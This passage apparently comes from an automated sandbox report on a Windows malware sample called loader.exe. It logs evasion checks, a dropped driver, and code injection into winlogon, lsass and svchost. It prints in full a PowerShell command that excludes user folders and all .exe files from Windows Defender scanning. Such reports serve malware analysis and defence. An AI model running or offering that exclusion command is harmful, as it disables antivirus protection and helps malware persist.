        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 11_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exe Code function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 39_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exe System information queried: FirmwareTableInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5343
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4435
        Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 5546
        Source: C:\Windows\System32\winlogon.exe Window / User API: threadDelayed 4453
        Source: C:\Windows\System32\lsass.exe Window / User API: threadDelayed 9872
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7372
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2097
        Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 9875
        Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 1719
        Source: C:\Windows\System32\dialer.exe Window / User API: threadDelayed 389
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe Dropped PE file which has not been started: C:\Windows\Temp\gyqerfjfsbie.sys
        Source: C:\Windows\System32\lsass.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_26-14886
        Source: C:\Windows\System32\svchost.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep graph_29-14869
        Source: C:\Windows\System32\dialer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_11-480
        Source: C:\Windows\System32\winlogon.exe API coverage: 6.8 %
        Source: C:\Windows\System32\lsass.exe API coverage: 7.3 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
        Source: C:\Windows\System32\dialer.exe API coverage: 0.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.7 %
        Source: C:\Windows\System32\svchost.exe API coverage: 5.1 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.4 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.7 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 5.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
        Source: C:\Windows\System32\svchost.exe API coverage: 5.8 %
        Source: C:\Windows\System32\svchost.exe API coverage: 4.9 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep count: 5343 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep count: 4435 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216 Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\System32\dialer.exe TID: 6824 Thread sleep count: 36 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 7364 Thread sleep count: 5546 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 7364 Thread sleep time: -5546000s >= -30000s
        Source: C:\Windows\System32\winlogon.exe TID: 7364 Thread sleep count: 4453 > 30
        Source: C:\Windows\System32\winlogon.exe TID: 7364 Thread sleep time: -4453000s >= -30000s
        Source: C:\Windows\System32\lsass.exe TID: 7492 Thread sleep count: 9872 > 30
        Source: C:\Windows\System32\lsass.exe TID: 7492 Thread sleep time: -9872000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep count: 7372 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep count: 2097 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496 Thread sleep time: -8301034833169293s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7508 Thread sleep count: 242 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7508 Thread sleep time: -242000s >= -30000s
        Source: C:\Windows\System32\dwm.exe TID: 7880 Thread sleep count: 9875 > 30
        Source: C:\Windows\System32\dwm.exe TID: 7880 Thread sleep time: -9875000s >= -30000s
        Source: C:\Windows\System32\dialer.exe TID: 7652 Thread sleep count: 1719 > 30
        Source: C:\Windows\System32\dialer.exe TID: 7652 Thread sleep time: -171900s >= -30000s
        Source: C:\Windows\System32\dialer.exe TID: 7856 Thread sleep count: 389 > 30
        Source: C:\Windows\System32\dialer.exe TID: 7856 Thread sleep time: -38900s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7904 Thread sleep count: 250 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7904 Thread sleep time: -250000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7928 Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7928 Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8008 Thread sleep count: 252 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8008 Thread sleep time: -252000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8020 Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8092 Thread sleep count: 209 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8092 Thread sleep time: -209000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8100 Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8100 Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8156 Thread sleep count: 239 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8156 Thread sleep time: -239000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 8176 Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 8176 Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 5544 Thread sleep count: 249 > 30
        Source: C:\Windows\System32\svchost.exe TID: 5544 Thread sleep time: -249000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 2448 Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 2448 Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 3004 Thread sleep count: 246 > 30
        Source: C:\Windows\System32\svchost.exe TID: 3004 Thread sleep time: -246000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7172 Thread sleep count: 241 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7172 Thread sleep time: -241000s >= -30000s
        Source: C:\Windows\System32\svchost.exe TID: 7176 Thread sleep count: 251 > 30
        Source: C:\Windows\System32\svchost.exe TID: 7176 Thread sleep time: -251000s >= -30000s
        Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (4 identical entries)
        Source: C:\Windows\System32\svchost.exe Last function: Thread delayed (28 identical entries)
        Source: C:\Windows\System32\dialer.exe Last function: Thread delayed (2 identical entries)
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC64DCE0 FindFirstFileExW, 20_2_00000225DC64DCE0
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC6ADCE0 FindFirstFileExW, 20_2_00000225DC6ADCE0
        Source: C:\Windows\System32\lsass.exe Code function: 26_2_00000202C0AEDCE0 FindFirstFileExW, 26_2_00000202C0AEDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 29_2_000002A66130DCE0 FindFirstFileExW, 29_2_000002A66130DCE0
        Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAEDFDCE0 FindFirstFileExW, 30_2_000002BAAEDFDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 45_2_0000026A879CDCE0 FindFirstFileExW, 45_2_0000026A879CDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 46_2_00000179537ADCE0 FindFirstFileExW, 46_2_00000179537ADCE0
        Source: C:\Windows\System32\svchost.exe Code function: 47_2_000002295D56DCE0 FindFirstFileExW, 47_2_000002295D56DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 50_2_0000025306E6DCE0 FindFirstFileExW, 50_2_0000025306E6DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001845B3CDCE0 FindFirstFileExW, 51_2_000001845B3CDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 53_2_000001ADECD4DCE0 FindFirstFileExW, 53_2_000001ADECD4DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 54_2_000001D55907DCE0 FindFirstFileExW, 54_2_000001D55907DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000241A9EADCE0 FindFirstFileExW, 55_2_00000241A9EADCE0
        Source: C:\Windows\System32\svchost.exe Code function: 56_2_000001CD7319DCE0 FindFirstFileExW, 56_2_000001CD7319DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 57_2_000002824E89DCE0 FindFirstFileExW, 57_2_000002824E89DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 58_2_0000021B47B3DCE0 FindFirstFileExW, 58_2_0000021B47B3DCE0
        Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_11-413
        Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_39-477
        Source: C:\Windows\System32\dialer.exe API call chain: ExitProcess graph end node graph_43-91
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00000225DC647D90
        Source: C:\Windows\System32\dialer.exe Code function: 43_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 43_2_00000001408460F0
        Source: C:\Windows\System32\dialer.exe Code function: 11_2_00000001400017EC GetProcessHeap,HeapAlloc,OpenProcess,TerminateProcess,CloseHandle,GetProcessHeap,HeapFree, 11_2_00000001400017EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
        Source: C:\Windows\System32\dialer.exe Process token adjusted: Debug
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00000225DC647D90
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00000225DC64D2A4
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC6A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00000225DC6A7D90
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC6AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 20_2_00000225DC6AD2A4
        Source: C:\Windows\System32\lsass.exe Code function: 26_2_00000202C0AED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00000202C0AED2A4
        Source: C:\Windows\System32\lsass.exe Code function: 26_2_00000202C0AE7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 26_2_00000202C0AE7D90
        Source: C:\Windows\System32\svchost.exe Code function: 29_2_000002A66130D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000002A66130D2A4
        Source: C:\Windows\System32\svchost.exe Code function: 29_2_000002A661307D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 29_2_000002A661307D90
        Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAEDF7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_000002BAAEDF7D90
        Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAEDFD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 30_2_000002BAAEDFD2A4
        Source: C:\Windows\System32\dialer.exe Code function: 42_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit, 42_2_0000000140001160
        Source: C:\Windows\System32\svchost.exe Code function: 45_2_0000026A879CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_0000026A879CD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 45_2_0000026A879C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 45_2_0000026A879C7D90
        Source: C:\Windows\System32\svchost.exe Code function: 46_2_00000179537A7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00000179537A7D90
        Source: C:\Windows\System32\svchost.exe Code function: 46_2_00000179537AD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 46_2_00000179537AD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 47_2_000002295D56D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000002295D56D2A4
        Source: C:\Windows\System32\svchost.exe Code function: 47_2_000002295D567D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 47_2_000002295D567D90
        Source: C:\Windows\System32\svchost.exe Code function: 50_2_0000025306E6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 50_2_0000025306E6D2A4
        Source: C:\Windows\System32\svchost.exe Code function: 50_2_0000025306E67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 50_2_0000025306E67D90
        Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001845B3CD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 51_2_000001845B3CD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001845B3C7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 51_2_000001845B3C7D90
        Source: C:\Windows\System32\svchost.exe Code function: 53_2_000001ADECD47D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 53_2_000001ADECD47D90
        Source: C:\Windows\System32\svchost.exe Code function: 53_2_000001ADECD4D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 53_2_000001ADECD4D2A4
        Source: C:\Windows\System32\svchost.exe Code function: 54_2_000001D55907D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 54_2_000001D55907D2A4
        Source: C:\Windows\System32\svchost.exe Code function: 54_2_000001D559077D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 54_2_000001D559077D90
        Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000241A9EAD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 55_2_00000241A9EAD2A4
        Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000241A9EA7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 55_2_00000241A9EA7D90
        Source: C:\Windows\System32\svchost.exe Code function: 56_2_000001CD7319D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 56_2_000001CD7319D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD73197D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,56_2_000001CD73197D90
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E897D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002824E897D90
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E89D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,57_2_000002824E89D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B3D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000021B47B3D2A4
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B37D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0000021B47B37D90

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\loader.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAED90000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC670000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\lsass.exe base: 202C0B10000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A661330000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1845B370000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B5645B0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2108B940000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 29166910000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
        Source: C:\Windows\System32\dialer.exe Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
